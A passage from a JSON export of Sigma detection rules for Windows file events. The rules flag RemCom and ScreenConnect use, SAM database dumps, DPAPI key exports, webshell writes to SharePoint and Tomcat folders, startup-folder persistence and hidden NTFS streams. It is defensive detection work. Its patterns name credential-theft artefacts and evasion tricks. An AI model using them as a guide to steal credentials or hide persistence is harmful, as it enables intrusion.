    "content": "title: RemCom Service File Creation\nid: 7eff1a7f-dd45-4c20-877a-f21e342a7611\nstatus: test\ndescription: Detects default RemCom service filename which indicates RemCom service installation and execution\nreferences:\n    - https://github.com/kavika13/RemCom/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-04\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\RemComSvc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml",
    "content": "title: ScreenConnect Temporary Installation Artefact\nid: fec96f39-988b-4586-b746-b93d59fd1922\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows\nauthor: frack113\ndate: 2022-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\Bin\\ScreenConnect.' # pattern to dll and jar file\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml",
    "content": "title: Remote Access Tool - ScreenConnect Temporary File\nid: 0afecb6e-6223-4a82-99fb-bf5b981e92a5\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of files in a specific location by ScreenConnect RMM.\n    ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to \":\\Users\\<username>\\Documents\\ConnectWiseControl\\Temp\\\" before execution.\nreferences:\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ScreenConnect.WindowsClient.exe'\n        TargetFilename|contains: '\\Documents\\ConnectWiseControl\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ScreenConnect\n# Note: Incase the level if ScreenConnect is not used\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ripzip_attack.yml",
    "content": "title: Potential RipZip Attack on Startup Folder\nid: a6976974-ea6f-4e97-818e-ea08625c52cb\nstatus: test\ndescription: |\n    Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\n    If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\n    Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\nreferences:\n    - https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19\nauthor: Greg (rule)\ndate: 2022-07-21\nmodified: 2023-01-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection: # %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\\target.lnk\n        TargetFilename|contains|all:\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n            - '.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}'\n        Image|endswith: '\\explorer.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sam_dump.yml",
    "content": "title: Potential SAM Database Dump\nid: 4e87b8e2-2ee9-4b2a-a715-4727d297ece0\nstatus: test\ndescription: Detects the creation of files that look like exports of the local SAM (Security Account Manager)\nreferences:\n    - https://github.com/search?q=CVE-2021-36934\n    - https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934\n    - https://www.google.com/search?q=%22reg.exe+save%22+sam\n    - https://github.com/HuskyHacks/ShadowSteal\n    - https://github.com/FireFart/hivenightmare\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-11\nmodified: 2023-01-05\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        - TargetFilename|endswith:\n              - '\\Temp\\sam'\n              - '\\sam.sav'\n              - '\\Intel\\sam'\n              - '\\sam.hive'\n              - '\\Perflogs\\sam'\n              - '\\ProgramData\\sam'\n              - '\\Users\\Public\\sam'\n              - '\\AppData\\Local\\sam'\n              - '\\AppData\\Roaming\\sam'\n              - '_ShadowSteal.zip'       # https://github.com/HuskyHacks/ShadowSteal\n              - '\\Documents\\SAM.export'  # https://github.com/n3tsurge/CVE-2021-36934/\n              - ':\\sam'\n        - TargetFilename|contains:\n              - '\\hive_sam_'             # https://github.com/FireFart/hivenightmare\n              - '\\sam.save'\n              - '\\sam.export'\n              - '\\~reg_sam.save'\n              - '\\sam_backup'\n              - '\\sam.bck'\n              - '\\sam.backup'\n    condition: selection\nfalsepositives:\n    - Rare cases of administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sed_file_creation.yml",
    "content": "title: Self Extraction Directive File Created In Potentially Suspicious Location\nid: 760e75d8-c3b5-409b-a9bf-6130b4c4603f\nrelated:\n    - id: ab90dab8-c7da-4010-9193-563528cfa347\n      type: derived\nstatus: test\ndescription: |\n    Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.\n    These files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\n    Attackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith: '.sed'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml",
    "content": "title: Windows Shell/Scripting Application File Write to Suspicious Folder\nid: 1277f594-a7d1-4f28-a2d3-73af5cbeab43\nstatus: test\ndescription: Detects Windows shells and scripting applications that write files to suspicious folders\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-20\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_1:\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\msbuild.exe'  # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\sh.exe'\n            - '\\wscript.exe'\n        TargetFilename|startswith:\n            - 'C:\\PerfLogs\\'\n            - 'C:\\Users\\Public\\'\n    selection_2:\n        Image|endswith:\n            - '\\certutil.exe'\n            - '\\forfiles.exe'\n            - '\\mshta.exe'\n            # - '\\rundll32.exe' # Potential FP\n            - '\\schtasks.exe'\n            - '\\scriptrunner.exe'\n            - '\\wmic.exe'  # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n        TargetFilename|contains:\n            - 'C:\\PerfLogs\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Temp\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml",
    "content": "title: Windows Binaries Write Suspicious Extensions\nid: b8fd0e93-ff58-4cbd-8f48-1c114e342e62\nrelated:\n    - id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43\n      type: derived\nstatus: test\ndescription: Detects Windows executables that write files with suspicious extensions\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        Image|endswith:\n            - '\\csrss.exe'\n            - '\\lsass.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\sihost.exe'\n            - '\\smss.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.iso'\n            - '.ps1'\n            - '.txt'\n            - '.vbe'\n            - '.vbs'\n    selection_special:\n        Image|endswith:\n            - '\\dllhost.exe'\n            - '\\rundll32.exe'\n            - '\\svchost.exe'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.hta'\n            - '.iso'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n    filter_main_AppLockerPolicyTest:\n        Image: 'C:\\Windows\\System32\\dllhost.exe'\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\__PSScriptPolicyTest_'\n        TargetFilename|endswith: '.ps1'\n    filter_main_script_gpo_machine:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n        TargetFilename|contains|all:\n            - 'C:\\Windows\\System32\\GroupPolicy\\DataStore\\'\n            - '\\sysvol\\'\n            - '\\Policies\\'\n            - '\\Machine\\Scripts\\Startup\\'\n        TargetFilename|endswith:\n            - '.ps1'\n            - '.bat'\n    filter_main_clipchamp:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n        TargetFilename|contains|all:\n            - 'C:\\Program Files\\WindowsApps\\Clipchamp'\n            - '.ps1'\n    filter_main_powershell_preview:\n        Image:\n            - 'C:\\Windows\\system32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - 'C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview'\n        TargetFilename|endswith: '.ps1'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml",
    "content": "title: Startup Folder File Write\nid: 2aa0a6b4-a865-495b-ab51-c28249537b75\nrelated:\n    - id: 28208707-fe31-437f-9a7f-4b1108b94d2e\n      type: similar\nstatus: test\ndescription: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/12\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2025-12-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp'\n    filter_main_update:\n        - Image:\n              - 'C:\\Windows\\System32\\wuauclt.exe'\n              - 'C:\\Windows\\uus\\ARM64\\wuaucltcore.exe'\n        - TargetFilename|startswith:\n              - 'C:\\$WINDOWS.~BT\\NewOS\\'\n              - 'C:\\$WinREAgent\\Scratch\\Mount\\'\n    filter_optional_onenote:\n        Image|endswith: '\\ONENOTE.EXE'\n        TargetFilename|endswith: '\\Send to OneNote.lnk'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_colorcpl.yml",
    "content": "title: Suspicious Creation with Colorcpl\nid: e15b518d-b4ce-4410-a9cd-501f23ce4a18\nstatus: test\ndescription: Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\\nreferences:\n    - https://twitter.com/eral4m/status/1480468728324231172?s=20\nauthor: frack113\ndate: 2022-01-21\nmodified: 2023-01-05\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\colorcpl.exe'\n    filter_ext:\n        TargetFilename|endswith:\n            - '.icm'\n            - '.gmmp'\n            - '.cdmp'\n            - '.camp'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml",
    "content": "title: Created Files by Microsoft Sync Center\nid: 409f8a98-4496-4aaa-818a-c931c0a8b832\nstatus: test\ndescription: This rule detects suspicious files created by Microsoft Sync Center (mobsync)\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim\ndate: 2022-04-28\nmodified: 2022-06-02\ntags:\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.t1218\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_mobsync:\n        Image|endswith: '\\mobsync.exe'\n    filter_created_file:\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    condition: selection_mobsync and filter_created_file\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml",
    "content": "title: Suspicious Files in Default GPO Folder\nid: 5f87308a-0a5b-4623-ae15-d8fa1809bc60\nstatus: test\ndescription: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim\ndate: 2022-04-28\ntags:\n    - attack.t1036.005\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml",
    "content": "title: Suspicious Creation TXT File in User Desktop\nid: caf02a0a-1e1c-4552-9b48-5e070bd88d11\nstatus: test\ndescription: Ransomware create txt file in the user Desktop\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note\nauthor: frack113\ndate: 2021-12-26\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        TargetFilename|contains|all:\n            - '\\Users\\'\n            - '\\Desktop\\'\n        TargetFilename|endswith: '.txt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml",
    "content": "title: Suspicious Desktopimgdownldr Target File\nid: fc4f4817-0c53-4683-a4ee-b17a64bc1039\nstatus: test\ndescription: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension\nreferences:\n    - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n    - https://twitter.com/SBousseaden/status/1278977301745741825\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-03\nmodified: 2022-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        TargetFilename|contains: '\\Personalization\\LockScreenImage\\'\n    filter1:\n        TargetFilename|contains: 'C:\\Windows\\'\n    filter2:\n        TargetFilename|contains:\n            - '.jpg'\n            - '.jpeg'\n            - '.png'\n    condition: selection and not filter1 and not filter2\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_diagcab.yml",
    "content": "title: Creation of a Diagcab\nid: 3d0ed417-3d94-4963-a562-4a92c940656a\nstatus: test\ndescription: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)\nreferences:\n    - https://threadreaderapp.com/thread/1533879688141086720.html\nauthor: frack113\ndate: 2022-06-08\ntags:\n    - attack.resource-development\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.diagcab'\n    condition: selection\nfalsepositives:\n    - Legitimate microsoft diagcab\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_double_extension.yml",
    "content": "title: Suspicious Double Extension Files\nid: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e\nrelated:\n    - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8\n      type: derived\n    - id: 3215aa19-f060-4332-86d5-5602511f3ca8\n      type: similar\nstatus: test\ndescription: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.\nreferences:\n    - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/\n    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\n    - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles\n    - https://twitter.com/malwrhunterteam/status/1235135745611960321\n    - https://twitter.com/luc4m/status/1073181154126254080\n    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\n    - https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2022-06-19\nmodified: 2025-07-22\ntags:\n    - attack.defense-evasion\n    - attack.t1036.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_gen:\n        TargetFilename|endswith:\n            - '.exe'\n            - '.iso'\n            - '.rar'\n            - '.svg'\n            - '.zip'\n            # - '.lnk'  # legitimate links can happen just anywhere\n        TargetFilename|contains:\n            - '.doc.'\n            - '.docx.'\n            - '.gif.'\n            - '.jpeg.'\n            - '.jpg.'\n            - '.mp3.'\n            - '.mp4.'\n            - '.pdf.'\n            - '.png.'\n            - '.ppt.'\n            - '.pptx.'\n            - '.rtf.'\n            - '.svg.'\n            - '.txt.'\n            - '.xls.'\n            - '.xlsx.'\n    selection_exe:\n        TargetFilename|endswith:\n            - '.rar.exe'\n            - '.zip.exe'\n    # Note: If you wanna keep using the \".lnk\" extension. You might uncomment this filter and add additional locations\n    # filter_main_lnk:\n    #     TargetFilename|contains:\n    #         - '\\AppData\\Roaming\\Microsoft\\Office\\Recent\\'\n    #         - '\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml",
    "content": "title: DPAPI Backup Keys And Certificate Export Activity IOC\nid: 7892ec59-c5bb-496d-8968-e5d210ca3ac4\nstatus: test\ndescription: |\n    Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.\nreferences:\n    - https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32\nauthor: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-26\ntags:\n    - attack.credential-access\n    - attack.t1555\n    - attack.t1552.004\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - 'ntds_capi_'\n            - 'ntds_legacy_'\n            - 'ntds_unknown_'\n        TargetFilename|endswith:\n            - '.cer'\n            - '.key'\n            - '.pfx'\n            - '.pvk'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml",
    "content": "title: Suspicious MSExchangeMailboxReplication ASPX Write\nid: 7280c9f3-a5af-45d0-916a-bc01cb4151c9\nstatus: test\ndescription: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\MSExchangeMailboxReplication.exe'\n        TargetFilename|endswith:\n            - '.aspx'\n            - '.asp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_executable_creation.yml",
    "content": "title: Suspicious Executable File Creation\nid: 74babdd6-a758-4549-9632-26535279e654\nstatus: test\ndescription: |\n    Detect creation of suspicious executable file names.\n    Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.\nreferences:\n    - https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae\n    - https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/\nauthor: frack113\ndate: 2022-09-05\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\$Recycle.Bin.exe'\n            - ':\\Documents and Settings.exe'\n            - ':\\MSOCache.exe'\n            - ':\\PerfLogs.exe'\n            - ':\\Recovery.exe'\n            - '.bat.exe'\n            - '.sys.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_file_write_in_webapps_root.yml",
    "content": "title: Suspicious File Write to Webapps Root Directory\nid: 89c42960-f244-4dad-9151-ae9b1a3287a2\nstatus: experimental\ndescription: |\n    Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.\n    This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    # Add more suspicious processes or paths or extensions as needed\n    selection_susp_img:\n        Image|endswith:\n            - '\\dotnet.exe'\n            - '\\w3wp.exe'\n            - '\\java.exe'\n    selection_servers:\n        TargetFilename|contains:\n            - '\\apache'\n            - '\\tomcat'\n    selection_path:\n        TargetFilename|contains: '\\webapps\\ROOT\\'\n    selection_susp_extensions:\n        TargetFilename|endswith: '.jsp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml",
    "content": "title: Suspicious File Write to SharePoint Layouts Directory\nid: 1f0489be-b496-4ddf-b3a9-5900f2044e9c\nstatus: experimental\ndescription: |\n    Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.\n    This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.\nreferences:\n    - https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/\n    - https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\w3wp.exe'\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n            - 'C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n        TargetFilename|contains:\n            - '\\15\\TEMPLATE\\LAYOUTS\\'\n            - '\\16\\TEMPLATE\\LAYOUTS\\'\n        TargetFilename|endswith:\n            - '.asax'\n            - '.ascx'\n            - '.ashx'\n            - '.asmx'\n            - '.asp'\n            - '.aspx'\n            - '.bat'\n            - '.cmd'\n            - '.cer'\n            - '.config'\n            - '.hta'\n            - '.js'\n            - '.jsp'\n            - '.jspx'\n            - '.php'\n            - '.ps1'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_get_variable.yml",
    "content": "title: Suspicious Get-Variable.exe Creation\nid: 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b\nstatus: test\ndescription: |\n    Get-Variable is a valid PowerShell cmdlet\n    WindowsApps is by default in the path where PowerShell is executed.\n    So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\nreferences:\n    - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\n    - https://www.joesandbox.com/analysis/465533/0/html\nauthor: frack113\ndate: 2022-04-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'Local\\Microsoft\\WindowsApps\\Get-Variable.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml",
    "content": "title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream\nid: a8f866e1-bdd4-425e-a27a-37619238d9c7\nrelated:\n    - id: 0900463c-b33b-49a8-be1d-552a3b553dae\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of hidden file/folder with the \"::$index_allocation\" stream. Which can be used as a technique to prevent access to folder and files from tooling such as \"explorer.exe\" and \"powershell.exe\"\nreferences:\n    - https://twitter.com/pfiatde/status/1681977680688738305\n    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/\n    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3\nauthor: Scoubi (@ScoubiMtl)\ndate: 2023-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        # Note: Both Sysmon and ETW are unable to log the presence of such streams in the CommandLine. But EDRs such as Crowdstrike are able to use e.g. CMD console history. Users are advised to test this before usage\n        TargetFilename|contains: '::$index_allocation'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml",
